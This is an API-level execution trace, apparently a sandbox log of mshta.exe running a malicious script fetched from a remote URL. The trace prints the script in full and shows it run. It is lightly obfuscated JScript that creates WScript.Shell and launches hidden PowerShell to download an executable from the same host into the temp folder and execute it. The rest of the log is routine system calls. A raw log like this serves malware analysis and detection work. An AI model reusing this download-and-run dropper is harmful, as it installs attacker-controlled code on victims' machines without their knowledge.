[0046.592] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1400, pPolicy=0x40f418, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f418*=0x0) returned 0x0 [0046.592] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.593] CoCreateInstance (in: rclsid=0x40f464*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x632a95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x40f420 | out: ppv=0x40f420*=0x1b31268) returned 0x0 [0046.729] GetVersion () returned 0x1db10106 [0046.729] __dllonexit () returned 0x6e8e7ecf [0046.729] __dllonexit () returned 0x6e8e7e9b [0046.729] __dllonexit () returned 0x6e8e7eb5 [0046.729] __dllonexit () returned 0x6e8e7f70 [0046.730] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x754d0000 [0046.730] GetProcAddress (hModule=0x754d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f5fb7d [0046.730] EtwRegisterTraceGuidsA () returned 0x0 [0046.730] GetProcAddress (hModule=0x754d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f5fb7d [0046.730] EtwRegisterTraceGuidsA () returned 0x0 [0046.730] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x40dddc, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0046.731] GetProcAddress (hModule=0x754d0000, lpProcName="RegOpenKeyExA") returned 0x754e4907 [0046.731] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x40df00 | out: phkResult=0x40df00*=0x0) returned 0x2 [0046.734] GetVersion () returned 0x1db10106 [0046.734] DllGetClassObject (in: rclsid=0x11e868*(Data1=0xf414c260, 
Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7673ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e6e4 | out: ppv=0x40e6e4*=0x59ff48) returned 0x0 [0046.734] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x59ff48, pUnkOuter=0x0, riid=0x40f090*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x40e6d0 | out: ppvObject=0x40e6d0*=0x1b31268) returned 0x0 [0046.734] GetUserDefaultLCID () returned 0x409 [0046.734] GetACP () returned 0x4e4 [0046.735] IUnknown:AddRef (This=0x1b31268) returned 0x2 [0046.735] IUnknown:Release (This=0x1b31268) returned 0x1 [0046.735] JScriptEngine5:IUnknown:Release (This=0x59ff48) returned 0x0 [0046.735] IUnknown:QueryInterface (in: This=0x1b31268, riid=0x632a95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x40f3c4 | out: ppvObject=0x40f3c4*=0x1b31268) returned 0x0 [0046.735] IUnknown:Release (This=0x1b31268) returned 0x1 [0046.735] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.735] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f334, dwFlags=0x0 | out: pdwZone=0x40f334*=0xffffffff) returned 0x800c0011 [0046.735] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.735] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.735] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.735] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1401, pPolicy=0x40f338, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f338*=0x0) returned 0x0 
[0046.735] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.736] GetCurrentThreadId () returned 0xa1c [0046.736] GetCurrentThreadId () returned 0xa1c [0046.736] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x40f260 | out: phkResult=0x40f260*=0x440) returned 0x0 [0046.737] GetProcAddress (hModule=0x754d0000, lpProcName="RegQueryValueExA") returned 0x754e48ef [0046.737] RegQueryValueExA (in: hKey=0x440, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x40f254, lpData=0x40f258, lpcbData=0x40f25c*=0x4 | out: lpType=0x40f254*=0x4, lpData=0x40f258*=0x1, lpcbData=0x40f25c*=0x4) returned 0x0 [0046.737] GetProcAddress (hModule=0x754d0000, lpProcName="RegCloseKey") returned 0x754e469d [0046.737] RegCloseKey (hKey=0x440) returned 0x0 [0046.737] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x766f0000 [0046.737] GetProcAddress (hModule=0x766f0000, lpProcName="CoGetObjectContext") returned 0x7673632b [0046.737] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x766f0000 [0046.737] GetProcAddress (hModule=0x766f0000, lpProcName="CoCreateInstance") returned 0x76739d0b [0046.737] CoCreateInstance (in: rclsid=0x6e8d23a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6e8d23b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f25c | out: ppv=0x40f25c*=0x76836460) returned 0x0 [0046.737] ??_U@YAPAXI@Z () returned 0x591290 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x40f200, nSize=0x27 | out: lpBuffer="") returned 0x0 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0046.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x40f270, 
cchData=6 | out: lpLCData="1252") returned 5 [0046.738] IsValidCodePage (CodePage=0x4e4) returned 1 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] CoCreateInstance (in: rclsid=0x6e8d15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6e8d15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x1b31454 | out: ppv=0x1b31454*=0x142738) returned 0x0 [0046.738] IUnknown:AddRef (This=0x142738) returned 0x2 [0046.738] GetCurrentProcessId () returned 0xa18 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] GetTickCount () returned 0x1a746 [0046.738] ISystemDebugEventFire:BeginSession (This=0x142738, guidSourceID=0x6e8d16d4, strSessionName="JScript:00002584:00002588:18108358") returned 0x0 [0046.739] GetCurrentThreadId () returned 0xa1c [0046.739] GetCurrentThreadId () returned 0xa1c [0046.739] GetCurrentThreadId () returned 0xa1c [0046.739] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0046.740] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f1cc | out: ppv=0x40f1cc*=0x116278) returned 0x0 [0046.740] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76836460, pUnk=0x59ffb8, riid=0x6e8d5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x59ffd4 | out: pdwCookie=0x59ffd4*=0x100) returned 0x0 [0046.740] IUnknown:QueryInterface (in: This=0x59ffb8, riid=0x767297c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40f150 | out: ppvObject=0x40f150*=0x0) returned 0x80004002 
[0046.740] IUnknown:QueryInterface (in: This=0x59ffb8, riid=0x76733e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40f140 | out: ppvObject=0x40f140*=0x0) returned 0x80004002 [0046.740] IUnknown:AddRef (This=0x59ffb8) returned 0x2 [0046.740] IUnknown:AddRef (This=0x116278) returned 0x2 [0046.740] IUnknown:Release (This=0x116278) returned 0x1 [0046.740] GetTickCount () returned 0x1a746 [0046.740] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f1e8 | out: ppv=0x40f1e8*=0x116278) returned 0x0 [0046.740] IUnknown:Release (This=0x116278) returned 0x1 [0046.740] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f1e8 | out: ppv=0x40f1e8*=0x116278) returned 0x0 [0046.740] IUnknown:Release (This=0x116278) returned 0x1 [0046.740] GetCurrentThreadId () returned 0xa1c [0046.740] GetProcAddress (hModule=0x75580000, lpProcName=0x2) returned 0x75584642 [0046.741] StrCmpIW (psz1="http://doc2th.com/tin/foobaz.txt", psz2="http://doc2th.com/tin/foobaz.txt") returned 0 [0046.741] GetCurrentThreadId () returned 0xa1c [0046.741] _wcsicmp (_String1="", _String2="") returned 0 [0046.741] SysStringLen (param_1="\r\nl='hell';\r\ne=['WScr'+'ipt.S'+l];\r\na=new ActiveXObject(e);\r\na.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\\'http://doc2th.com/tin/off.exe\\', \\'%TEMP%/lambdoidtegument.exe\\');%TEMP%/lambdoidtegument.exe', 0); \r\nwindow.close();\r\n") returned 0x13c [0046.743] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f308 | out: ppv=0x40f308*=0x116278) returned 0x0 
[0046.743] IUnknown:Release (This=0x116278) returned 0x1 [0046.744] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f358 | out: ppv=0x40f358*=0x116278) returned 0x0 [0046.744] IUnknown:Release (This=0x116278) returned 0x1 [0046.744] ISystemDebugEventFire:IsActive (This=0x142738) returned 0x1 [0046.744] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f354 | out: ppv=0x40f354*=0x116278) returned 0x0 [0046.744] IUnknown:Release (This=0x116278) returned 0x1 [0046.744] GetCurrentThreadId () returned 0xa1c [0046.744] GetCurrentThreadId () returned 0xa1c [0046.745] GetCurrentThreadId () returned 0xa1c [0046.745] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.745] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x6c) returned 0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x6c) returned 0 [0046.747] GetCurrentThreadId () returned 0xa1c [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x65) returned 0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x65) returned 0 [0046.749] GetCurrentThreadId () returned 0xa1c [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] CoInternetIsFeatureEnabled 
(FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] IsCharSpaceW (wch=0x61) returned 0 [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] IsCharSpaceW (wch=0x61) returned 0 [0046.752] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x766f0000 [0046.752] GetProcAddress (hModule=0x766f0000, lpProcName="CLSIDFromProgIDEx") returned 0x76700782 [0046.752] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x40ef1c | out: lpclsid=0x40ef1c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0046.754] SysStringLen (param_1=0x0) returned 0x0 [0046.754] GetProcAddress (hModule=0x766f0000, lpProcName="CoGetClassObject") returned 0x767254ad [0046.754] CoGetClassObject (in: rclsid=0x40ef1c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x6e8d087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40ef10 | out: ppv=0x40ef10*=0x1b33a20) returned 0x0 [0047.021] GetVersionExA (in: lpVersionInformation=0x40daf8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x76fa2dd6, dwPlatformId=0x76e4f761, szCSDVersion="°Û@") | out: lpVersionInformation=0x40daf8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.021] GetUserDefaultLCID () returned 0x409 [0047.021] DllGetClassObject (in: rclsid=0x11e89c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x40ebc0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e278 | out: 
ppv=0x40e278*=0x1b33a20) returned 0x0 [0047.021] WshShell:IUnknown:AddRef (This=0x1b33a20) returned 0x2 [0047.021] WshShell:IUnknown:Release (This=0x1b33a20) returned 0x1 [0047.021] WshShell:IUnknown:QueryInterface (in: This=0x1b33a20, riid=0x6e8d087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40ee3c | out: ppvObject=0x40ee3c*=0x1b33a20) returned 0x0 [0047.021] WshShell:IUnknown:Release (This=0x1b33a20) returned 0x1 [0047.021] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x40ed98, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0047.021] lstrlenA (lpString="\\wscript.exe") returned 12 [0047.021] lstrlenA (lpString="C:\\Windows\\system32\\mShta.exe") returned 29 [0047.021] _strcmpi (_Str1="32\\mShta.exe", _Str2="\\wscript.exe") returned -1 [0047.021] _strcmpi (_Str1="32\\mShta.exe", _Str2="\\cscript.exe") returned -1 [0047.021] LoadRegTypeLib (in: rguid=0x71f914bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x40ef3c*=0x0 | out: pptlib=0x40ef3c*=0x16ec00) returned 0x0 [0047.025] ITypeLib:GetTypeInfoOfGuid (in: This=0x16ec00, GUID=0x71f914cc, ppTInfo=0x40ef20 | out: ppTInfo=0x40ef20*=0x17d5dc) returned 0x0 [0047.025] ITypeInfo:GetRefTypeOfImplType (in: This=0x17d5dc, index=0xffffffff, pRefType=0x40ef14 | out: pRefType=0x40ef14*=0xfffffffe) returned 0x0 [0047.025] ITypeInfo:GetRefTypeInfo (in: This=0x17d5dc, hreftype=0xfffffffe, ppTInfo=0x71fa501c | out: ppTInfo=0x71fa501c*=0x17d608) returned 0x0 [0047.025] IUnknown:Release (This=0x17d5dc) returned 0x1 [0047.025] IUnknown:Release (This=0x16ec00) returned 0x1 [0047.026] IUnknown:AddRef (This=0x17d608) returned 0x2 [0047.026] ITypeInfo:LocalGetIDsOfNames (This=0x17d608) returned 0x0 [0047.026] IUnknown:Release 
(This=0x17d608) returned 0x1 [0047.026] IUnknown:AddRef (This=0x17d608) returned 0x2 [0047.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0047.026] ITypeInfo:LocalInvoke (This=0x17d608) returned 0x0 [0047.026] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', '%TEMP%/lambdoidtegument.exe');%TEMP%/lambdoidtegument.exe", lpDst=0x40e42c, nSize=0x400 | out: lpDst="C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe") returned 0x115 [0047.026] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75810000 [0047.026] GetProcAddress (hModule=0x75810000, lpProcName="ShellExecuteExW") returned 0x75831e46 [0047.026] ShellExecuteExW (in: pExecInfo=0x40ebf8*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe", lpParameters="-windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x40ebf8*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe", lpParameters="-windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe", lpDirectory=0x0, nShow=0, hInstApp=0x2a, 
lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0047.028] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.028] SetTimer (hWnd=0x10204, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0047.028] GetCurrentThreadId () returned 0xa1c [0047.133] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.133] KillTimer (hWnd=0x10204, uIDEvent=0x1008) returned 1 [0047.133] GetCurrentThreadId () returned 0xa1c [0047.188] IUnknown:Release (This=0x17d608) returned 0x1 [0047.188] GetCurrentThreadId () returned 0xa1c [0047.188] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0047.188] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0047.189] GetCurrentThreadId () returned 0xa1c [0047.189] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0047.252] PostMessageW (hWnd=0x10200, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0047.252] GetCurrentThreadId () returned 0xa1c [0047.252] GetCurrentThreadId () returned 0xa1c [0047.253] ISystemDebugEventFire:IsActive (This=0x142738) returned 0x1 [0047.253] GetCurrentThreadId () returned 0xa1c [0047.253] GetCurrentThreadId () returned 0xa1c [0047.253] GetCurrentThreadId () returned 0xa1c [0047.261] GetSystemDefaultLCID () returned 0x409 [0047.261] GetVersionExW (in: lpVersionInformation=0x40f358*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x1a4390, dwMinorVersion=0x10, dwBuildNumber=0xf0000, dwPlatformId=0x10000, szCSDVersion="탨\x13@斔盺ĸ\x0f数盺퉈睃") | out: lpVersionInformation=0x40f358*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.261] GetKeyboardLayoutList (in: nBuff=32, lpList=0x40f2d8 | out: lpList=0x40f2d8) returned 1 [0047.261] GetSystemMetrics (nIndex=4096) returned 0 [0047.261] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0047.261] 
RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b2 [0047.261] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b5 [0047.261] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0047.261] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0047.261] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0047.261] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07c [0047.261] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0047.261] SetTimer (hWnd=0x10204, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0047.262] RedrawWindow (hWnd=0x10204, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0047.262] GetTickCount () returned 0x1a86e [0047.271] IUnknown:Release (This=0x11ae64) returned 0x11 [0047.271] IUnknown:Release (This=0x124868) returned 0x3 [0047.271] IUnknown:Release (This=0x11ae64) returned 0x10 [0047.274] IUnknown:Release (This=0x11ae64) returned 0xf [0047.274] IUnknown:Release (This=0x124868) returned 0x2 [0047.274] IUnknown:Release (This=0x11ae64) returned 0xe [0047.274] IUnknown:Release (This=0x11ae64) returned 0xd [0047.274] IUnknown:Release (This=0x11ae64) returned 0xc [0047.275] IUnknown:Release (This=0x11ae64) returned 0xb [0047.275] IUnknown:Release (This=0x14b3e8) returned 0x1 [0047.275] IUnknown:Release (This=0x14b3e8) returned 0x0 [0047.275] IUnknown:Release (This=0x11ae64) returned 0x8 [0047.275] IUnknown:Release (This=0x11ae64) returned 0x7 [0047.275] IUnknown:Release (This=0x11ae64) returned 0x6 [0047.275] LoadStringW (in: hInstance=0x6d270000, uID=0x1fe9, lpBuffer=0x40f368, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0047.277] GetFocus () returned 0x10204 [0047.278] GetFocus () returned 0x10204 [0047.278] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.278] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | 
out: lpPoint=0x40eec8) returned 1 [0047.278] GetKeyState (nVirtKey=16) returned 0 [0047.278] GetKeyState (nVirtKey=17) returned 0 [0047.278] GetKeyState (nVirtKey=18) returned 0 [0047.278] GetKeyState (nVirtKey=160) returned 0 [0047.278] GetKeyState (nVirtKey=162) returned 0 [0047.278] GetKeyState (nVirtKey=164) returned 0 [0047.278] GetCapture () returned 0x0 [0047.278] GetCurrentThreadId () returned 0xa1c [0047.278] GetCurrentThreadId () returned 0xa1c [0047.278] GetCurrentThreadId () returned 0xa1c [0047.278] GetFocus () returned 0x10204 [0047.278] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.278] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.278] GetKeyState (nVirtKey=16) returned 0 [0047.278] GetKeyState (nVirtKey=17) returned 0 [0047.278] GetKeyState (nVirtKey=18) returned 0 [0047.278] GetKeyState (nVirtKey=160) returned 0 [0047.278] GetKeyState (nVirtKey=162) returned 0 [0047.278] GetKeyState (nVirtKey=164) returned 0 [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.279] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.279] GetKeyState (nVirtKey=16) returned 0 [0047.279] GetKeyState (nVirtKey=17) returned 0 [0047.279] GetKeyState (nVirtKey=18) returned 0 [0047.279] GetKeyState (nVirtKey=160) returned 0 [0047.279] GetKeyState (nVirtKey=162) returned 0 [0047.279] GetKeyState (nVirtKey=164) returned 0 [0047.279] GetCapture () returned 0x0 [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.279] ScreenToClient (in: hWnd=0x10204, 
